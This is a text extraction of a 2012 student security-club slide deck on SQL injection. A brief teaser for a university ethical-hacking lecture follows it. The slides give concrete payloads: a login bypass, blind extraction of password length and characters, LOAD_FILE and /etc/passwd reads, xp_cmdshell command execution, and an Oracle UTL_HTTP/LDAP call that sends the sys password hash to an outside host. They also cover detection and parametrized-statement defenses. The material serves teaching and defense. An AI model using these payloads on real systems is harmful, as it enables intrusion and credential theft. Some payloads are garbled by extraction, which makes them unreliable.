Let me SQL inject your heart!

Size: px

Start display at page:

Download "Let me SQL inject your heart!"

Clara Anthony
6 years ago
Views:

1 _ (in)security we trust _!! SecurIMAG Let me SQL inject your heart! Injection vulnerabilities are common for web applications. Some do target databases: «SQL injections». The impact when exploiting such vulnerabilities rates from data retrieval, modifications, deletion till under certain case remote code execution! Speakers: Franck De Goër, Fabien Duchene WARNING: SecurIMAG is a security club at Ensimag. Thoughts, ideas and opinions are not related to Ensimag. The authors assume no liability including for errors and omissions.

2 Franck De Goër - Parcours : - prépa PT à F. Buisson (VOIRON, 38) - 1è Année ENSIMAG - Objectifs : - ISI - thèse (?) - enseignement-recherche - WHY Security? : Touche à toutes les branches de l'informatique, et multiples approches possibles pour un problème donné 2 SecurIMAG - SQLi F. De Goër F. Duchene 09 FEV 2012

3 Outline Introduction Injection attacking datastores (XPath, LDAP, SQL) SQL language SQL injection 3 Definitions Fingerprinting (specificities: Oracle, MS SQL, MySQL) Some cool beef: first order SQLi second order SQL injection blind SQLi Automatic detection Counter-measures Conclusion SecurIMAG - SQLi F. De Goër F. Duchene 09 FEV 2012

4 Injection «Security exploitation technique that permits injecting data and/or code» Some injection examples: Targeted system In-memory executable Web Server CGI-like application Data-Stores What can be injected? Assembly instructions Additional HTML nodes Additional DATA and or COMMANDS Vulnerabilities examples Buffer Overflow Cross site scripting (XSS) Use-After-Free SVG injection SQL injection XPATH injection LDAP injection 4 SecurIMAG - SQLi F. De Goër F. Duchene 09 FEV 2012

5 Web injection - intuitively For a given transition (HTTP request / HTTP REPLY) an injection is the ability to craft an input parameter, so that a subsystem not filtering enough that input parameter uses it for data or code. Input parameters examples: - User-Agent: - HTTP METHOD: HEAD, GET Output examples: - HTTP CONTENT - HTTP-Only cookies - HTML code 5 SecurIMAG - SQLi F. De Goër F. Duchene 09 FEV 2012

6 Structured Query Language - Relational databases current: SQL3 (SQL99). SQL grammar - language for: -- interrogating: SELECT -- data manipulation: UPDATE, INSERT, DELETE -- data definition: CREATE, ALTER, DROP -- data access control: GRANT, REVOKE Database: francky-vincent record Table: accounts Table: news id user password id date text field 1 franck Ada.Text_Io SQLi F.De Goër F. Duchene 6 2 securimag quarante-deux 2 SecurIMAG - SQLi F. De Goër F. Duchene 09 FEV

7 SQL query example - interrogating a database: extract of the SQL grammar for the SELECT statement: SELECT * FROM table WHERE cond Eg: SELECT id FROM accounts WHERE user='franck' AND password='ada.text_io' Database: francky-vincent record Table: accounts Table: news id user password id date text field 1 franck Ada.Text_Io SQLi F.De Goër F. Duchene 7 2 securimag quarante-deux 2 SecurIMAG - SQLi F. De Goër F. Duchene 09 FEV

8 Outline Introduction Injection attacking datastores (XPath, LDAP, SQL) SQL language SQL injection 8 Definitions Fingerprinting (specificities: Oracle, MS SQL, MySQL) Some cool beef: first order SQLi second order SQL injection blind SQLi Automatic detection Counter-measures Conclusion SecurIMAG - SQLi F. De Goër F. Duchene 09 FEV 2012

9 SQL injection intuitively (1/4) HTTP Eg: mysql library API SQL HTML HTTP CGI HTTP client Eg: Browser Eg: httpd+php SQL Daemon Eg: mysqld 9 User input = a set of input parameters SecurIMAG - SQLi F. De Goër F. Duchene 09 FEV 2012 The Web Application Hacker s Handbook 2 nd ed

10 SQL injection intuitively (2/4) HTML form: HTTP Request: 10 SecurIMAG - SQLi F. De Goër F. Duchene 09 FEV 2012

11 SQL injection intuitively (3/4) Hidden.php (source code extract) Some of the input parameters: GET - utilisateur=les blagues toto GET - motdepasse=sukz! SQL Query (sent to the SQL driver via the SQL API): SELECT * FROM data WHERE user='les blagues toto' AND password='sukz!'

12 SQL injection intuitively (4/4) -> Problem: how to bypass that authentication scheme? Hidden.php (source code extract) Some of the input parameters: GET - utilisateur=??? GET - motdepasse=???? SQL Query (sent to the SQL driver via the SQL API): SELECT * FROM data WHERE user='les blagues toto' AND password='sukz!' OR 69=69 --'

13 SQL injection intuitively - Franck DEMO SQL injection intuitively - Franck DEMO

14 SQL injection a formal definition (1/3) 14 Techniques and Tools for Engineering Secure Web Applications, PhD Thesis, Gary Michael Wassermann (2008) SecurIMAG - SQLi F. De Goër F. Duchene 09 FEV 2012

15 SQL injection a formal definition (2/3) 15 Techniques and Tools for Engineering Secure Web Applications, PhD Thesis, Gary Michael Wassermann (2008) SecurIMAG - SQLi F. De Goër F. Duchene 09 FEV 2012

16 SQL injection a formal definition (3/3) Input parameter 1 Input parameter 2 16 Techniques and Tools for Engineering Secure Web Applications, PhD Thesis, Gary Michael Wassermann (2008) SecurIMAG - SQLi F. De Goër F. Duchene 09 FEV 2012

SQL injection with uncatched error / exception Depending of how the web application developer did create his application: - when we craft an input parameter, and the evaluated query is not

17 SQL injection with uncatched error / exception Depending of how the web application developer did create his application: - when we craft an input parameter, and the evaluated query is not conform wrt. SQL Grammar - ERROR and or EXCEPTION MIGHT BE raised or catched! - SQL query that is sent to the SQL back-end is displayed 17 SecurIMAG - SQLi F. De Goër F. Duchene 09 FEV 2012

18 Database system fingerprinting: WHY (1/4) Useful for: - information gathering (part of a pentester s job) -- which SQL system is used? (software + version) -- what is the SQL language version -- what are the privileges the user does have - stored procedures specific to an SQL server - exploits specific to an SQL server version 18 SecurIMAG - SQLi F. De Goër F. Duchene 09 FEV 2012

19 Database system fingerprinting: WHY (2/4) DB \ impact Oracle SQL HTTP, SMTP, TCP Requests UTL_SMTP, UTL_HTTP UTL_TCP toto UTL_HTTP_REQUEST('ir c.car-online.fr: 80/' (SELECT %20%username,passwor d%from%data%where 1))-- LDAP query! (11g) SYS.DBMS_LDAP.INIT(' ldap.intranet: 389',null) SYS.DBMS_LDAP.INIT(( SELECT password FROM SYS.USER$ WHERE name='sys') '.sub.c ar-online.fr',80) SecurIMAG - =tle - author - date

20 Database system fingerprinting: WHY (3/4) DB \ impact Remote command execution Ability to write on the filesystem Shutdown!! MS-SQL Stored procedure: master..xp_cmd shell 'ipconfig /all > toto.txt' SELECT * INTO OUTFILE '\\\ \fqdn-server\ \sharename\ \output.txt' FROM users; 'shutdown -- SecurIMAG - =tle - author - date

21 Database system fingerprinting: WHY (4/4) DB \ impact Information disclosure Ability to write on the filesystem MySQL SELECT LOAD_FILE('/ etc/passwd') SELECT * FROM data INTO OUTFILE '/tmp/ wtf.txt' SecurIMAG - =tle - author - date

22 Database system fingerprinting: HOW - try directly to inject parts of the previous SQL queries and check for any output indicating that an error occurred. SOME EXAMPLES: DB \ impact Oracle Causing a time delay UTL_HTTP.REQUEST(' 10/') Database version SELECT banner FROM v$version Current user privileges SELECT privilege FROM session_privs MS-SQL WAITFOR DELAY '0:0:10' SELECT grantee, table_name, privilege_type FROM INFORMATION_SCHEMA.TAB LE_PRIVILEGES MySQL SLEEP(100) SELECT * FROM information_schema.use r_privileges WHERE grantee = (SELECT user()) SecurIMAG - =tle - author - date The Web Application Hacker s Handbook 2 nd ed

23 Database system fingerprinting: Franck DEMO Database system fingerprinting: Franck DEMO SecurIMAG - =tle - author - date

24 Blind SQL injection Sometimes, when an SQL error is raised, the SQL query in NOT present in the webpage (HTML) output! Blind SQLi Idea: discriminate the result by observing a DIFFERENCE in the OUTPUT (HTML) when a part of the SQL query the attacker controls evaluates to FALSE or TRUE Eg: WHERE cond1 AND cond2 Attacker controlled 24 SecurIMAG - SQLi F. De Goër F. Duchene 09 FEV 2012

25 Blind SQLi: obtaing information on records SELECT id, record1 FROM table WHERE id = '$existing_id' GROUP BY 2; --'; # return error if nb records < 2 # else return normal print => with several tests, possible to know the number of records To know record names, brutforce SELECT id, record1 FROM table WHERE id = '$existing_id' GROUP BY password; //'; 25 SecurIMAG - SQLi F. De Goër F. Duchene 09 FEV 2012

26 Blind SQLi: obtaining the length of a password For instance, if inputs are GET parameters : AND length(password)=$i # return error if lenght(pass)!= $i # else return normal print => by incrementing $i until normal print, we can know the length of the password 26 SecurIMAG - SQLi F. De Goër F. Duchene 09 FEV 2012

27 Blind SQLi: obtaining an integer value (1/5)

28 Blind SQLi: obtaining an integer value (2/5)

29 Blind SQLi: obtaining an integer value (3/)

30 Blind SQLi: obtaining an integer value (3/5)

31 Blind SQLi: obtaining an integer value (4/5)

32 Blind SQLi: obtaining an integer value (5/5)

33 Blind SQLi: obtaining the characters of a password Get password characters Clever brutforce and substring(password,$i,1)=char($ascii_code) # return error if the ith character isn't char($ascii_code) # else return normal print => by testing $ascii_code, we can know the ith password character 33 SecurIMAG - SQLi F. De Goër F. Duchene 09 FEV 2012

34 Blind SQLi StalkR s write-up for phplist SMPCTF 2010 From Blind SQL injection to local file inclusion!

35 35

36 Where? page=users&start=0&find=juanito&findby=e mail&sortby=0&sortorder=desc&id=0&find=j uanito&findby= 36

37 SQLi Query such as SELECT field1, field2 FROM table1 WHERE condition1 AND value2=[user_controlled_field] Filtering? User controlled values? findby sortorder 37

38 Interesting field for condition? findby= findby=1 same page output 38

39 findby=1 39

40 findby=1 AND 1 same page output! Nice start 40

41 findby=1 AND 0 41

42 Blind SQLi discriminant String present on the webpage when condition is evaluated to false Eg: "Database error You have an error.. 42

43 Ex1 Blind SQLi to LFI Requires FILE privilege LOAD_FILE Problem: filtering on quotes in the findby parameter Hex encoded values Findby=1 AND substr(lpad(bin(ord(substr(load file(0x +file.encode( hex )+ ), +str(charpos +1)+,1))),8,0), +str(bitpos+1)+,1)=1 43

44 StalkR script I did modify to take into account user-provided discriminant and that checks if the file does exist ensimag-student@bt:~/desktop/ex1-script$./ phplist_21012_sql_injection_local_file_disclosure.py [*] phplist SQL injection, local file disclosure Usage:./ phplist_21012_sql_injection_local_file_disclosure.py <host> <path to phplist> <admin username> <admin password> <file to get> <discriminate_string_when_condition_evaluated_to_ false> 44

45 45

46 46

47 Automatic (and formal) detection From the server side: Observing if the user input controlled parameter is syntactically confined If not: this is a sufficient condition for saying it is an injection! 47 Techniques and Tools for Engineering Secure Web Applications, PhD Thesis, Gary Michael Wassermann (2008) SecurIMAG - SQLi F. De Goër F. Duchene 09 FEV 2012

48 Automatic detection: sqlmap.py - client side - Python script - Ability to fingerprint various SQL back-ends: SecurIMAG - =tle - author - date

49 Automatic detection: sqlmap.py - DEMO Franck DEMO SecurIMAG - =tle - author - date

50 Counter-measures: Input filters Input Filters: some developers assume that filtering the input is enough. Which is sometimes not the case.!%^$#! This however does complicate the injection! Filter examples: - PHP : addslashes() injection will still work if query is like: WHERE integer_field=[user_controlled_input] SecurIMAG - =tle - author - date

51 Input filters and Second Order SQL injections (1/2) 0. Filter: add a second quote 1. New user registration input1= meeraque' ; input2= Mj t0 INSERT INTO data (username,password) VALUES('meeraque''', Mj t0') => Record will contain meerauqe' SecurIMAG - =tle - author - date

52 Input filters and Second Order SQL injections (2/2) 2. Change password: SELECT password FROM data WHERE username='meeraque' MySQL error! ERROR: Unclosed 42 STR: 3. Exploitation: 3.1 Register a user with username ' OR 1 in (SELECT password FROM data WHERE username='admeenistraore') 3.2. try to change the password P0wn3d! Admin password in the MySQL error message! SecurIMAG - =tle - author - date

53 Counter-measures: parametrized statements - PROBLEM: the SQL injection problem come from a not clear separation between DATA and COMMAND parts when building the SQL query - parametrized statements: 53 SecurIMAG - SQLi F. De Goër F. Duchene 09 FEV 2012

54 Counter-measures: parametrized statements SecurIMAG - =tle - author - date

55 Outline Introduction Injection attacking datastores (XPath, LDAP, SQL) SQL language SQL injection 55 Definitions Fingerprinting (specificities: Oracle, MS SQL, MySQL) Some cool beef: first order SQLi second order SQL injection blind SQLi Automatic detection Counter-measures Conclusion SecurIMAG - SQLi F. De Goër F. Duchene 09 FEV 2012

56 No questions please! We have exhausted our knowledge (and frankly, I feel more about starting the apero $ 56 SecurIMAG - SQLi F. De Goër F. Duchene 09 FEV 2012

Lecture 7: Web hacking 3, SQL injection, Xpath injection, Server side template injection, File inclusion

IN5290 Ethical Hacking Lecture 7: Web hacking 3, SQL injection, Xpath injection, Server side template injection, File inclusion Universitetet i Oslo Laszlo Erdödi Lecture Overview What is SQL injection